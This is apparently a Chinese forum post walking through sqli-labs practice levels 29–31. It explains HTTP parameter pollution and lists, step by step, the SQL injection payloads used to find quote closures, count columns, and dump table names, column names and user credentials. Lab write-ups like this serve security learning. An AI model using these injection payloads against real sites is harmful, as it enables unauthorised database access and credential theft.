sqli-labs靶场29-31关(http参数污染)

打印 上一主题 下一主题

主题 2005|帖子 2005|积分 6015

目录
媒介
less29(单引号http参数污染)
less30(双引号http参数污染)
less31(双引号括号http参数污染)


媒介

JSP中,使用request.getParameter("id")获取请求参数时,如果存在多个同名参数,它会返回第一个参数的值。这是因为request.getParameter()方法的设计是返回第一个匹配的参数值。
PHP中,使用$_GET["id"]获取请求参数时,如果存在多个同名参数,它会返回最后一个参数的值。这是因为PHP的$_GET超全局数组会覆盖前面的同名参数值。
好比:
?id=2&id=1返回的是id=1的请求:



less29(单引号http参数污染)

这一关如果直接union查询注入,就是很底子的sql注入。实在这里考察的是http参数污染注入。
?id=2&id=1'报错——判定为单引号闭合
?id=2&id=1'--+正常回显——确定为单引号闭合
?id=2&id=1' order by 3--+——判定有三处回显
?id=2&id=' union select 1,2,3--+——判定出回显位置
?id=2&id=' union select 1,user(),database()--+——爆数据库和数据库用户:

?id=2&id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+——爆表名
?id=2&id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+——爆字段名
?id=2&id=' union select 1,2,group_concat(id) from security.users--+—— 爆数据


less30(双引号http参数污染)

?id=a&id=1'正常回显
?id=a&id=1"无回显——判定为双引号闭合
?id=a&id=1"--+——正常回显,确定为双引号闭合
?id=a&id=1" order by 3--+——判定有三处回显位
?id=a&id=" union select 1,2,3--+——找到回显位置
?id=a&id=" union select 1,2,database()--+——爆数据库
?id=a&id=" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+——爆表名
?id=a&id=" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+——爆字段名
?id=a&id=" union select 1,2,group_concat(username,password) from security.users--+——爆数据



less31(双引号括号http参数污染)

?id=0&id=2正常回显,?id=0&id=2'正常回显
?id=0&id=2"报错——判定为双引号闭合
?id=0&id=2"--+又报错
?id=0&id=2")--+正常回显——判定为双引号括号闭合:

?id=0&id=2") order by 3--+——判定有三处回显
?id=0&id=") union select 1,2,3--+——找到回显位置
?id=0&id=") union select 1,2,database()--+——爆数据库
?id=0&id=") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+——爆表名
?id=0&id=") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+——爆字段名
?id=0&id=") union select 1,2,group_concat(id,password) from security.users--+——爆数据




免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

正序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

欢乐狗

论坛元老
这个人很懒什么都没写!
快速回复 返回顶部 返回列表